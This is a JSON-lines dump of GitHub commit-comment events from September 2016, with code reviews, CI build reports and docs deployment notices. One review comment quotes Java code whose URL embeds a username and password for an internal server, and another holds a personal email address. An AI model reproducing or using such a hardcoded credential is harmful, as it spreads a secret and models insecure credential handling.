{"id":"4564560433","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":19026679,"position":null,"line":null,"path":null,"commit_id":"959128179ece6069beb1b43abf24a0961e6d1896","created_at":"2016-09-14T20:59:47Z","updated_at":"2016-09-14T20:59:47Z","body":"Oh, and getKey works in TI-Basic, it is just CONSTANTLY getting a char, so\nyou need to put it in a while loop and make sure it's not 0.\n\nOn Wed, Sep 14, 2016 at 4:58 PM, Zachary T <zacharacutey@gmail.com> wrote:\n\n> Alex, I'm making a multi-language text adventure.\n>\n> *THE D VERSION IS PRIORITY.*\n>\n>\n"}},"created_at":"2016-09-14T20:59:47Z"}
{"id":"4564563910","type":"CommitCommentEvent","actor":{"login":"vananos"},"repo":{"name":"DmitriyOK/helper"},"payload":{"comment":{"id":19026690,"position":172,"line":172,"path":"backend/src/main/java/ru/avito/model/CallModel.java","commit_id":"3c81ad959c55a92cf3dece93dac075599e9b48ae","created_at":"2016-09-14T21:00:26Z","updated_at":"2016-09-14T21:00:26Z","body":"А это вообще как к бд относится?"}},"created_at":"2016-09-14T21:00:26Z"}
{"id":"4564565756","type":"CommitCommentEvent","actor":{"login":"SibTiger"},"repo":{"name":"SibTiger/OMG_I_CANT_DIVIDE_BY_ZERO_EXLAMATIONMARK"},"payload":{"comment":{"id":19026696,"position":6,"line":6,"path":"WatchingBadGamesThanksLowTax","commit_id":"787871b8e98fafdf0077af7f4b4f592350a81ea1","created_at":"2016-09-14T21:00:42Z","updated_at":"2016-09-14T21:00:42Z","body":"s/bus/cat/"}},"created_at":"2016-09-14T21:00:42Z"}
{"id":"4564570945","type":"CommitCommentEvent","actor":{"login":"vananos"},"repo":{"name":"DmitriyOK/helper"},"payload":{"comment":{"id":19026710,"position":180,"line":180,"path":"backend/src/main/java/ru/avito/model/CallModel.java","commit_id":"3c81ad959c55a92cf3dece93dac075599e9b48ae","created_at":"2016-09-14T21:01:32Z","updated_at":"2016-09-14T21:01:32Z","body":"```java\r\nformat(\"c:\\\\callrecords\\\\%s\\\\\", date);\r\n```"}},"created_at":"2016-09-14T21:01:32Z"}
{"id":"4564571536","type":"CommitCommentEvent","actor":{"login":"vswindell"},"repo":{"name":"vswindell/dojo_rules"},"payload":{"comment":{"id":19026711,"position":null,"line":null,"path":null,"commit_id":"15142917ec65ae3fc816ff0fc614c7e7d849535b","created_at":"2016-09-14T21:01:38Z","updated_at":"2016-09-14T21:01:38Z","body":"The ability of rebase"}},"created_at":"2016-09-14T21:01:38Z"}
{"id":"4564571957","type":"CommitCommentEvent","actor":{"login":"SibTiger"},"repo":{"name":"SibTiger/OMG_I_CANT_DIVIDE_BY_ZERO_EXLAMATIONMARK"},"payload":{"comment":{"id":19026713,"position":null,"line":null,"path":null,"commit_id":"787871b8e98fafdf0077af7f4b4f592350a81ea1","created_at":"2016-09-14T21:01:43Z","updated_at":"2016-09-14T21:01:43Z","body":"I added notes here, so do something!  Or not, who cares"}},"created_at":"2016-09-14T21:01:43Z"}
{"id":"4564574419","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":19026719,"position":null,"line":null,"path":null,"commit_id":"a6d5e0c8b9d386f1b917e61c46d9710723c42f2f","created_at":"2016-09-14T21:02:10Z","updated_at":"2016-09-14T21:02:10Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 33](http://teamcity.otenv.com/viewLog.html?buildId=5212610&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) outcome was **SUCCESS**\nSummary: Tests passed: 28 Build time: 00:03:34"}},"created_at":"2016-09-14T21:02:10Z"}
{"id":"4564574641","type":"CommitCommentEvent","actor":{"login":"gkop"},"repo":{"name":"circleci/circleci-docs"},"payload":{"comment":{"id":19026720,"position":174,"line":174,"path":"_docs/docker.md","commit_id":"93893a57b836ccfe173cf130e87a09bc1dab19b4","created_at":"2016-09-14T21:02:12Z","updated_at":"2016-09-14T21:02:12Z","body":"The [docker-registry repo](https://hub.docker.com/r/google/docker-registry/) recommends as of February 2015 to use Google Container Registry. Are there any changes to these instructions required to use Google Container Registry?"}},"created_at":"2016-09-14T21:02:12Z"}
{"id":"4564574873","type":"CommitCommentEvent","actor":{"login":"registe"},"repo":{"name":"iHavee/dockerfiles"},"payload":{"comment":{"id":19026721,"position":4,"line":37,"path":"transmission/Dockerfile","commit_id":"dc6b8231e13ee5d8420b45b775455789b50542a5","created_at":"2016-09-14T21:02:15Z","updated_at":"2016-09-14T21:02:15Z","body":"thanks for your friendly reminder."}},"created_at":"2016-09-14T21:02:15Z"}
{"id":"4564575141","type":"CommitCommentEvent","actor":{"login":"ZelAk312"},"repo":{"name":"ZelAk312/testing"},"payload":{"comment":{"id":19026722,"position":null,"line":null,"path":null,"commit_id":"f78edb833e43b9c5341cb82c8d453bf63b19e6fa","created_at":"2016-09-14T21:02:17Z","updated_at":"2016-09-14T21:02:17Z","body":"testing"}},"created_at":"2016-09-14T21:02:17Z"}
{"id":"4564577029","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":19026725,"position":null,"line":null,"path":null,"commit_id":"4e25cceb68ed05ff6697d994bf458ddc2f45fa9f","created_at":"2016-09-14T21:02:34Z","updated_at":"2016-09-14T21:02:34Z","body":"The following doc(s) have been deployed to the [icylacepat](https://icylacepat-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/multidev](https://icylacepat-static-docs.pantheonsite.io/docs/multidev)\n"}},"created_at":"2016-09-14T21:02:34Z"}
{"id":"4564577046","type":"CommitCommentEvent","actor":{"login":"sampathweb"},"repo":{"name":"rohans90/dsp"},"payload":{"comment":{"id":19026726,"position":15,"line":10,"path":"python/q8_parsing.py","commit_id":"2feb826345dccc6153105ba88f4cafd684856fcb","created_at":"2016-09-14T21:02:34Z","updated_at":"2016-09-14T21:02:34Z","body":"@rohans90 Could have been written as `data = [row for row in readdata]`  in List Comprehension syntax."}},"created_at":"2016-09-14T21:02:34Z"}
{"id":"4564579443","type":"CommitCommentEvent","actor":{"login":"anilirik"},"repo":{"name":"anilirik/phms"},"payload":{"comment":{"id":19026730,"position":18,"line":15,"path":"agreement.md","commit_id":"d1e6fc4df79555c4b35c65e564eb49e08c66e2d0","created_at":"2016-09-14T21:02:59Z","updated_at":"2016-09-14T21:02:59Z","body":"Про точку невозврата я уже писала выше"}},"created_at":"2016-09-14T21:02:59Z"}
{"id":"4564579810","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19026732,"position":null,"line":null,"path":null,"commit_id":"ce38a20beac15dd001d28d4f00609beda91e7d4c","created_at":"2016-09-14T21:03:04Z","updated_at":"2016-09-14T21:03:04Z","body":"develop (Unknown) - x86_64-Linux-Ubuntu-14.04-clang-3.5: OK (2362 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-ce38a20beac15dd001d28d4f00609beda91e7d4c-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-ce38a20beac15dd001d28d4f00609beda91e7d4c-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-96.49%25-yellow.svg)</a> \n"}},"created_at":"2016-09-14T21:03:04Z"}
{"id":"4564580517","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":19026734,"position":null,"line":null,"path":null,"commit_id":"03ecbc999ba0dc184a1a46048b62ac30f70f2827","created_at":"2016-09-14T21:03:13Z","updated_at":"2016-09-14T21:03:13Z","body":"The following doc(s) have been deployed to the [terminusma](https://terminusma-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/terminus/commands](https://terminusma-static-docs.pantheonsite.io/docs/terminus/commands)\n- [docs/terminus/install](https://terminusma-static-docs.pantheonsite.io/docs/terminus/install)\n- [source/_partials/terminus_navbar.html](https://github.com/pantheon-systems/documentation/commit/03ecbc999ba0dc184a1a46048b62ac30f70f2827/source/_partials/terminus_navbar.html)\n- [source/_views/terminuspage.html](https://github.com/pantheon-systems/documentation/commit/03ecbc999ba0dc184a1a46048b62ac30f70f2827/source/_views/terminuspage.html)\n- [source/docs/assets/css/main.css](https://github.com/pantheon-systems/documentation/commit/03ecbc999ba0dc184a1a46048b62ac30f70f2827/source/docs/assets/css/main.css)\n- [source/docs/assets/js/main.js](https://github.com/pantheon-systems/documentation/commit/03ecbc999ba0dc184a1a46048b62ac30f70f2827/source/docs/assets/js/main.js)\n"}},"created_at":"2016-09-14T21:03:13Z"}
{"id":"4564580855","type":"CommitCommentEvent","actor":{"login":"SibTiger"},"repo":{"name":"SibTiger/OMG_I_CANT_DIVIDE_BY_ZERO_EXLAMATIONMARK"},"payload":{"comment":{"id":19026735,"position":4,"line":4,"path":"WatchingBadGamesThanksLowTax","commit_id":"787871b8e98fafdf0077af7f4b4f592350a81ea1","created_at":"2016-09-14T21:03:16Z","updated_at":"2016-09-14T21:03:16Z","body":"I object with [this](https://youtu.be/TnzRBZd5_uA)!"}},"created_at":"2016-09-14T21:03:16Z"}
{"id":"4564583506","type":"CommitCommentEvent","actor":{"login":"vananos"},"repo":{"name":"DmitriyOK/helper"},"payload":{"comment":{"id":19026741,"position":190,"line":190,"path":"backend/src/main/java/ru/avito/model/CallModel.java","commit_id":"3c81ad959c55a92cf3dece93dac075599e9b48ae","created_at":"2016-09-14T21:03:44Z","updated_at":"2016-09-14T21:03:44Z","body":"Вообще это явно должно быть не здесь и сделано как то не так как должно... это надо переделать."}},"created_at":"2016-09-14T21:03:44Z"}
{"id":"4564586459","type":"CommitCommentEvent","actor":{"login":"vananos"},"repo":{"name":"DmitriyOK/helper"},"payload":{"comment":{"id":19026757,"position":197,"line":197,"path":"backend/src/main/java/ru/avito/model/CallModel.java","commit_id":"3c81ad959c55a92cf3dece93dac075599e9b48ae","created_at":"2016-09-14T21:04:17Z","updated_at":"2016-09-14T21:04:17Z","body":"И зачем эта переменная?"}},"created_at":"2016-09-14T21:04:17Z"}
{"id":"4564592889","type":"CommitCommentEvent","actor":{"login":"ZelAk312"},"repo":{"name":"ZelAk312/testing"},"payload":{"comment":{"id":19026765,"position":null,"line":null,"path":null,"commit_id":"f78edb833e43b9c5341cb82c8d453bf63b19e6fa","created_at":"2016-09-14T21:05:24Z","updated_at":"2016-09-14T21:05:24Z","body":"testing"}},"created_at":"2016-09-14T21:05:24Z"}
{"id":"4564594990","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19026768,"position":null,"line":null,"path":null,"commit_id":"a589d57cd91a7c39bf95a159df891437041e583e","created_at":"2016-09-14T21:05:39Z","updated_at":"2016-09-14T21:05:39Z","body":"os_2.0_develop_signal_slot_bug (kbenne) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-a589d57cd91a7c39bf95a159df891437041e583e-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-a589d57cd91a7c39bf95a159df891437041e583e-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-14T21:05:39Z"}
{"id":"4564596919","type":"CommitCommentEvent","actor":{"login":"vananos"},"repo":{"name":"DmitriyOK/helper"},"payload":{"comment":{"id":19026771,"position":35,"line":35,"path":"backend/src/main/java/ru/avito/model/CategoryModel.java","commit_id":"3c81ad959c55a92cf3dece93dac075599e9b48ae","created_at":"2016-09-14T21:06:00Z","updated_at":"2016-09-14T21:06:00Z","body":"Вообще это ко всем местам относится, это надо все переделать, это на самом деле полный костыль... Сейчас понима насколько это убожество. Надо генерить полноценные Json объекты, а не Json объект, содержащий строку, которая тоже json объект... \r\nВообще это везде надо переделать... это жесть."}},"created_at":"2016-09-14T21:06:00Z"}
{"id":"4564600041","type":"CommitCommentEvent","actor":{"login":"sampathweb"},"repo":{"name":"sandymule/dsp"},"payload":{"comment":{"id":19026777,"position":null,"line":null,"path":null,"commit_id":"8deb4e14b30a0fd8ac1ee8673fa56adbf00fa9a9","created_at":"2016-09-14T21:06:32Z","updated_at":"2016-09-14T21:06:32Z","body":"@sandymule Looks like you are using Tab Character with 8 spaces in your indentation.  In Python, it's recommended to use 4 spaces for indentation.  You could configure your tabs to be translated to 4 spaces."}},"created_at":"2016-09-14T21:06:32Z"}
{"id":"4564601939","type":"CommitCommentEvent","actor":{"login":"sampathweb"},"repo":{"name":"sandymule/dsp"},"payload":{"comment":{"id":19026783,"position":7,"line":5,"path":"python/advanced_python_dict.py","commit_id":"8deb4e14b30a0fd8ac1ee8673fa56adbf00fa9a9","created_at":"2016-09-14T21:06:53Z","updated_at":"2016-09-14T21:06:53Z","body":"Good use of Context Manager with statement 👍 "}},"created_at":"2016-09-14T21:06:53Z"}
{"id":"4564602297","type":"CommitCommentEvent","actor":{"login":"vananos"},"repo":{"name":"DmitriyOK/helper"},"payload":{"comment":{"id":19026785,"position":22,"line":22,"path":"backend/src/main/java/ru/avito/model/StatModel.java","commit_id":"3c81ad959c55a92cf3dece93dac075599e9b48ae","created_at":"2016-09-14T21:06:57Z","updated_at":"2016-09-14T21:06:57Z","body":"С этим однозначно надо что то делать... со всем этим классом."}},"created_at":"2016-09-14T21:06:57Z"}
{"id":"4564605385","type":"CommitCommentEvent","actor":{"login":"sampathweb"},"repo":{"name":"sandymule/dsp"},"payload":{"comment":{"id":19026794,"position":11,"line":9,"path":"python/advanced_python_dict.py","commit_id":"8deb4e14b30a0fd8ac1ee8673fa56adbf00fa9a9","created_at":"2016-09-14T21:07:32Z","updated_at":"2016-09-14T21:07:32Z","body":"@sandymule This could have been re-written as `facultydata = [row for row in reader]`"}},"created_at":"2016-09-14T21:07:32Z"}
{"id":"4564609685","type":"CommitCommentEvent","actor":{"login":"anilirik"},"repo":{"name":"anilirik/phms"},"payload":{"comment":{"id":19026805,"position":9,"line":9,"path":"agreement.md","commit_id":"d1e6fc4df79555c4b35c65e564eb49e08c66e2d0","created_at":"2016-09-14T21:08:18Z","updated_at":"2016-09-14T21:08:18Z","body":"Я убрала части, которые касаются отношений с Клиентом, добавила про организацию учебного процесса."}},"created_at":"2016-09-14T21:08:18Z"}
{"id":"4564610359","type":"CommitCommentEvent","actor":{"login":"atjonathan"},"repo":{"name":"Musare/MusareNode"},"payload":{"comment":{"id":19026806,"position":4,"line":21,"path":"frontend/components/HomeBody.vue","commit_id":"bf7770df4b10c384d410246ea09b29c07429b03e","created_at":"2016-09-14T21:08:25Z","updated_at":"2016-09-14T21:08:25Z","body":"`line 27` 😂 "}},"created_at":"2016-09-14T21:08:25Z"}
{"id":"4564614828","type":"CommitCommentEvent","actor":{"login":"IDisposable"},"repo":{"name":"aspnet/Mvc"},"payload":{"comment":{"id":19026819,"position":null,"line":null,"path":null,"commit_id":"630dde05939bf22a03eb97ce2dd7c9f81c11ea7c","created_at":"2016-09-14T21:09:13Z","updated_at":"2016-09-14T21:09:13Z","body":"Would love to see the factory logic factored out instead of copy/pasta"}},"created_at":"2016-09-14T21:09:13Z"}
{"id":"4564618808","type":"CommitCommentEvent","actor":{"login":"Mike-j-t"},"repo":{"name":"Mike-j-t/ACSCalc"},"payload":{"comment":{"id":19026830,"position":null,"line":null,"path":null,"commit_id":"93d5c5aa048e8c8ce6141e126324a74204d23874","created_at":"2016-09-14T21:09:55Z","updated_at":"2016-09-14T21:09:55Z","body":"OK to go"}},"created_at":"2016-09-14T21:09:55Z"}
{"id":"4564619604","type":"CommitCommentEvent","actor":{"login":"vananos"},"repo":{"name":"DmitriyOK/helper"},"payload":{"comment":{"id":19026831,"position":64,"line":64,"path":"backend/src/main/java/ru/avito/web/OktellListener.java","commit_id":"3c81ad959c55a92cf3dece93dac075599e9b48ae","created_at":"2016-09-14T21:10:05Z","updated_at":"2016-09-14T21:10:05Z","body":"Насколько я понял, ты вообще не понимаешь многопоточность, советую почитать. \r\n1. StringBuffer - не потокобезопасен, потокобезопасен StringBuilder.\r\n2. На кой черт ты сначала клеишь строки, а потом это пихаешь в стрингбуффер?\r\n3. Если уж ты хотел добиться потокобезопасности, то стоит знать, что все переменные объявленные внутри метода, априори потокобезопасны, поэтому вообще не понятно, к чему все это..."}},"created_at":"2016-09-14T21:10:05Z"}
{"id":"4564620600","type":"CommitCommentEvent","actor":{"login":"acrm"},"repo":{"name":"EkaSe/HelloWorld"},"payload":{"comment":{"id":19026834,"position":29,"line":0,"path":"HelloWorld/Program.cs","commit_id":"2391a5456b36e0df75957fd399219e23754dab9a","created_at":"2016-09-14T21:10:17Z","updated_at":"2016-09-14T21:10:17Z","body":"Отлично)"}},"created_at":"2016-09-14T21:10:17Z"}
{"id":"4564620831","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19026836,"position":null,"line":null,"path":null,"commit_id":"ce38a20beac15dd001d28d4f00609beda91e7d4c","created_at":"2016-09-14T21:10:19Z","updated_at":"2016-09-14T21:10:19Z","body":"develop (Unknown) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-ce38a20beac15dd001d28d4f00609beda91e7d4c-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a>  \n"}},"created_at":"2016-09-14T21:10:19Z"}
{"id":"4564621426","type":"CommitCommentEvent","actor":{"login":"Sycholic"},"repo":{"name":"Sycholic/PermissionsEx"},"payload":{"comment":{"id":19026837,"position":null,"line":null,"path":null,"commit_id":"3f73a5df0473d9fdb079e51f3e29dcd02b5f0d31","created_at":"2016-09-14T21:10:25Z","updated_at":"2016-09-14T21:10:25Z","body":"Performance hit when you do not concatenate strings in logger messages without using template messages with placeholders that get replaced later with concrete values.  IF and when that message is actually going to be logged."}},"created_at":"2016-09-14T21:10:25Z"}
{"id":"4564626566","type":"CommitCommentEvent","actor":{"login":"vananos"},"repo":{"name":"DmitriyOK/helper"},"payload":{"comment":{"id":19026847,"position":31,"line":31,"path":"backend/src/main/java/ru/avito/web/OktellListener.java","commit_id":"3c81ad959c55a92cf3dece93dac075599e9b48ae","created_at":"2016-09-14T21:11:20Z","updated_at":"2016-09-14T21:11:20Z","body":"Этот класс надо полностью переписать, это полный шит)"}},"created_at":"2016-09-14T21:11:20Z"}
{"id":"4564630700","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19026852,"position":null,"line":null,"path":null,"commit_id":"dae2a3a7fec0df526060f325075c9d965fabcfd1","created_at":"2016-09-14T21:12:03Z","updated_at":"2016-09-14T21:12:03Z","body":"os_2_0_develop_linux (macumber) - x86_64-Linux-Ubuntu-14.04-clang-3.5: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-dae2a3a7fec0df526060f325075c9d965fabcfd1-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-dae2a3a7fec0df526060f325075c9d965fabcfd1-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-14T21:12:03Z"}
{"id":"4564631381","type":"CommitCommentEvent","actor":{"login":"vananos"},"repo":{"name":"DmitriyOK/helper"},"payload":{"comment":{"id":19026855,"position":69,"line":69,"path":"backend/src/main/java/ru/avito/web/OktellListener.java","commit_id":"3c81ad959c55a92cf3dece93dac075599e9b48ae","created_at":"2016-09-14T21:12:12Z","updated_at":"2016-09-14T21:12:12Z","body":"http://cs.pikabu.ru/images/big_size_comm/2012-10_6/13516210919297.jpg"}},"created_at":"2016-09-14T21:12:12Z"}
{"id":"4564631763","type":"CommitCommentEvent","actor":{"login":"mohammedbarzan"},"repo":{"name":"mohammedbarzan/mohammedbarzan.github.io"},"payload":{"comment":{"id":19026856,"position":null,"line":null,"path":null,"commit_id":"fc71a295f4225808fbeb8a866ba75d5c1e862257","created_at":"2016-09-14T21:12:16Z","updated_at":"2016-09-14T21:12:16Z","body":"hello"}},"created_at":"2016-09-14T21:12:16Z"}
{"id":"4564635857","type":"CommitCommentEvent","actor":{"login":"ragesoss"},"repo":{"name":"WikiEducationFoundation/WikiEduDashboard"},"payload":{"comment":{"id":19026868,"position":11,"line":24,"path":"app/assets/javascripts/utils/course_date_utils.coffee","commit_id":"e4a7e23e9525a2771d23c8e32d5b5e63f87d929e","created_at":"2016-09-14T21:12:59Z","updated_at":"2016-09-14T21:12:59Z","body":"What's this for?"}},"created_at":"2016-09-14T21:12:59Z"}
{"id":"4564643021","type":"CommitCommentEvent","actor":{"login":"vananos"},"repo":{"name":"DmitriyOK/helper"},"payload":{"comment":{"id":19026883,"position":146,"line":146,"path":"backend/src/main/java/ru/avito/web/OktellListener.java","commit_id":"3c81ad959c55a92cf3dece93dac075599e9b48ae","created_at":"2016-09-14T21:14:19Z","updated_at":"2016-09-14T21:14:19Z","body":"```java\r\nformat(\"http://web_api:s7cgr3Ev@192.168.3.10:4055/download/byscript?name=\" +\r\n           \"Avito_get_file_by_id_conn&startparam1=%s&attachment=1\", idconn);\r\n)\r\n```"}},"created_at":"2016-09-14T21:14:19Z"}
{"id":"4564648346","type":"CommitCommentEvent","actor":{"login":"rynowak"},"repo":{"name":"aspnet/Mvc"},"payload":{"comment":{"id":19026897,"position":null,"line":null,"path":null,"commit_id":"630dde05939bf22a03eb97ce2dd7c9f81c11ea7c","created_at":"2016-09-14T21:15:18Z","updated_at":"2016-09-14T21:15:18Z","body":"This is a workaround for a bug in some versions of .Net. It's intended that `SHA256.Create()` do the right thing, that's supposed to be the factory method :+1: "}},"created_at":"2016-09-14T21:15:18Z"}
{"id":"4564650631","type":"CommitCommentEvent","actor":{"login":"fernandog"},"repo":{"name":"pymedusa/SickRage"},"payload":{"comment":{"id":19026902,"position":32,"line":710,"path":"sickbeard/show_queue.py","commit_id":"ff35f25a85666f29906f2de8f9eb9083b3a63f29","created_at":"2016-09-14T21:15:40Z","updated_at":"2016-09-14T21:15:40Z","body":"@ratoaq2 now im not sure if I have to remove this: `curEp.save_to_db()`"}},"created_at":"2016-09-14T21:15:40Z"}
{"id":"4564651858","type":"CommitCommentEvent","actor":{"login":"zapelin"},"repo":{"name":"zapelin/collab-github-v2"},"payload":{"comment":{"id":19026905,"position":null,"line":null,"path":null,"commit_id":"7e54b2530596e06cb70bfb9da829a794d97fd3b8","created_at":"2016-09-14T21:15:53Z","updated_at":"2016-09-14T21:15:53Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://localhost:8080/ui#review:id=1003)"}},"created_at":"2016-09-14T21:15:53Z"}
{"id":"4564651943","type":"CommitCommentEvent","actor":{"login":"zapelin"},"repo":{"name":"zapelin/collab-github-v2"},"payload":{"comment":{"id":19026906,"position":null,"line":null,"path":null,"commit_id":"c047bfb0d734d665f4648dac5ddb273d053f500f","created_at":"2016-09-14T21:15:54Z","updated_at":"2016-09-14T21:15:54Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://localhost:8080/ui#review:id=1004)"}},"created_at":"2016-09-14T21:15:54Z"}
{"id":"4564652010","type":"CommitCommentEvent","actor":{"login":"zapelin"},"repo":{"name":"zapelin/collab-github-v2"},"payload":{"comment":{"id":19026907,"position":null,"line":null,"path":null,"commit_id":"46a7860b1955a709d6503402d33ede95c30fb03e","created_at":"2016-09-14T21:15:55Z","updated_at":"2016-09-14T21:15:55Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://localhost:8080/ui#review:id=1005)"}},"created_at":"2016-09-14T21:15:55Z"}
{"id":"4564652100","type":"CommitCommentEvent","actor":{"login":"zapelin"},"repo":{"name":"zapelin/collab-github-v2"},"payload":{"comment":{"id":19026908,"position":null,"line":null,"path":null,"commit_id":"a25ae2581dd9cb1ba376dc0b065f0b9dab9971ef","created_at":"2016-09-14T21:15:56Z","updated_at":"2016-09-14T21:15:56Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://localhost:8080/ui#review:id=1006)"}},"created_at":"2016-09-14T21:15:56Z"}
{"id":"4564652109","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":19026909,"position":null,"line":null,"path":null,"commit_id":"0fc753b3d104c87b2190768c21bafab82a3875fb","created_at":"2016-09-14T21:15:56Z","updated_at":"2016-09-14T21:15:56Z","body":"The following doc(s) have been deployed to the [icylacepat](https://icylacepat-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/multidev](https://icylacepat-static-docs.pantheonsite.io/docs/multidev)\n"}},"created_at":"2016-09-14T21:15:56Z"}
{"id":"4564652176","type":"CommitCommentEvent","actor":{"login":"zapelin"},"repo":{"name":"zapelin/collab-github-v2"},"payload":{"comment":{"id":19026910,"position":null,"line":null,"path":null,"commit_id":"33b651a781905938b5e77f0a5677ea147ec4b53d","created_at":"2016-09-14T21:15:57Z","updated_at":"2016-09-14T21:15:57Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://localhost:8080/ui#review:id=1007)"}},"created_at":"2016-09-14T21:15:57Z"}
{"id":"4564652246","type":"CommitCommentEvent","actor":{"login":"zapelin"},"repo":{"name":"zapelin/collab-github-v2"},"payload":{"comment":{"id":19026911,"position":null,"line":null,"path":null,"commit_id":"e55351db3d1fc59af2f1df41b4767f3c75a6dc31","created_at":"2016-09-14T21:15:59Z","updated_at":"2016-09-14T21:15:59Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://localhost:8080/ui#review:id=1008)"}},"created_at":"2016-09-14T21:15:59Z"}
{"id":"4564652334","type":"CommitCommentEvent","actor":{"login":"zapelin"},"repo":{"name":"zapelin/collab-github-v2"},"payload":{"comment":{"id":19026912,"position":null,"line":null,"path":null,"commit_id":"6c0d90cdd73ca5913a6d09a104a01f86bf721fa2","created_at":"2016-09-14T21:16:00Z","updated_at":"2016-09-14T21:16:00Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://localhost:8080/ui#review:id=1009)"}},"created_at":"2016-09-14T21:16:00Z"}
{"id":"4564652435","type":"CommitCommentEvent","actor":{"login":"zapelin"},"repo":{"name":"zapelin/collab-github-v2"},"payload":{"comment":{"id":19026914,"position":null,"line":null,"path":null,"commit_id":"4050eb931cb9c89178bc92487dedc413c8d3cde9","created_at":"2016-09-14T21:16:01Z","updated_at":"2016-09-14T21:16:01Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://localhost:8080/ui#review:id=1010)"}},"created_at":"2016-09-14T21:16:01Z"}
{"id":"4564652531","type":"CommitCommentEvent","actor":{"login":"zapelin"},"repo":{"name":"zapelin/collab-github-v2"},"payload":{"comment":{"id":19026915,"position":null,"line":null,"path":null,"commit_id":"0682c671f908629bb7853878e19de16dd29a0bbb","created_at":"2016-09-14T21:16:03Z","updated_at":"2016-09-14T21:16:03Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://localhost:8080/ui#review:id=1011)"}},"created_at":"2016-09-14T21:16:03Z"}
{"id":"4564652604","type":"CommitCommentEvent","actor":{"login":"zapelin"},"repo":{"name":"zapelin/collab-github-v2"},"payload":{"comment":{"id":19026916,"position":null,"line":null,"path":null,"commit_id":"928f3b2b06928ca81b5644b6781f232c556102ee","created_at":"2016-09-14T21:16:04Z","updated_at":"2016-09-14T21:16:04Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://localhost:8080/ui#review:id=1012)"}},"created_at":"2016-09-14T21:16:04Z"}
{"id":"4564652706","type":"CommitCommentEvent","actor":{"login":"zapelin"},"repo":{"name":"zapelin/collab-github-v2"},"payload":{"comment":{"id":19026917,"position":null,"line":null,"path":null,"commit_id":"1d9929d6e19bdcd847cf5f6b6b8d0827b957c18c","created_at":"2016-09-14T21:16:05Z","updated_at":"2016-09-14T21:16:05Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://localhost:8080/ui#review:id=1013)"}},"created_at":"2016-09-14T21:16:05Z"}
{"id":"4564653095","type":"CommitCommentEvent","actor":{"login":"zapelin"},"repo":{"name":"zapelin/collab-github-v2"},"payload":{"comment":{"id":19026919,"position":null,"line":null,"path":null,"commit_id":"d592408e6c9230683028a36b7ed8069d0eb12dbc","created_at":"2016-09-14T21:16:11Z","updated_at":"2016-09-14T21:16:11Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://localhost:8080/ui#review:id=1014)"}},"created_at":"2016-09-14T21:16:11Z"}
